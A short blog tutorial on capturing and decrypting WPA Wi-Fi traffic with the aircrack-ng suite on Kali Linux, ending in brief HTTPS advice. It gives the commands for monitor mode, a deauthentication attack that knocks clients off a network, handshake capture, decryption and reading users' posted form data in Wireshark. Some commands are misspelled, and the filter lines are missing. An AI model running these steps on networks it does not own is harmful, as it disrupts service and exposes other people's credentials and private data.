Barış Kısır

Software Developer

 » Home
 » Contact
 » RSS

Capture & Decrypt Wireless Packets

23 Jul 2017 » linux, kali, security

This post is for educational purposes only, I do not take any responsibility for your actions.

What we need?

airmon-ng for enable monitor mode on wireless adaptors. - Pre-installed on Kali Linux.

airodump-ng for capture wireless packets. - Pre-installed on Kali Linux.

airdecap-ng for decrypt wireless packets. - Pre-installed on Kali Linux.

aireplay-ng for generate fake traffic and attack for capture the 4-way handshake file. - Pre-installed on Kali Linux.

wireshark for open wireless packets. - Pre-installed on Kali Linux.

You can download Kali Linux from here –> Download

Let’s begin

// run airmon-ng to see all network adaptors you have.


// enable monitor mode on selected wireless adaptor.
airmon-ng start wlan0
// now you enabled monitor mode on your wireless adaptor and it changed to wlan0mon.


// listen all networks around you
airodump-np wlan0mon
// when you collect enough network, interrupt it by pressing Ctrl+C


// capturing specific network.
// packageName is the file name that you want to save.
// 1 is the channel number that target router is broadcasting.
// bssid is the mac address of the router.
airodump-ng -w packageName -c 1 --bssid EC:08:XX:XX:FE:5F wlan0mon
// do not close the terminal, open another terminal for next steps.


// You need handshake file for decrypt cap. Only way to do that, user needs to connect router while listening network.
// In this case, you need to send deauth packages to target router and everyone will need to reconnect.
// -0 parameter for --deauth command. You can use --deauth also.
// 0 is the delay between deauth packages.
// -a for mac address.
aireplay -0 0 -a EC:08:XX:XX:FE:5F wlan0mon
// when you get the handshake file top-right, interrupt it by pressing Ctrl+C


// when you collect enough packets, you can move to decrypt part.

// Decrypting cap file
// -p is the WPA password of router.
// -e is the SSID (wifi name). If SSID contains spaces, you need to write between single quotation marks 'My Router Name'
// packageName-02.cap is the package that you captured.
airdecap-ng -p my-secret-password -e peace-repeater packageName-02.cap
// Decrypted file will be packageName-02-dec.cap


// open decrypted package by using wireshark
wireshark packageName-02-dec.cap

// You can filter GET and POST request by using
// or
// in the x-www-form-urlencoded section, you can see what information that user post.


How to avoid?

  • Use HTTPS for your own website.
  • On another websites, make sure they have https before posting any sensitive information.
  • Even though if you are on ethernet, your http traffic still can be tracked with network devices.

Website that I use for test


This post is for educational purposes only, I do not take any responsibility for your actions.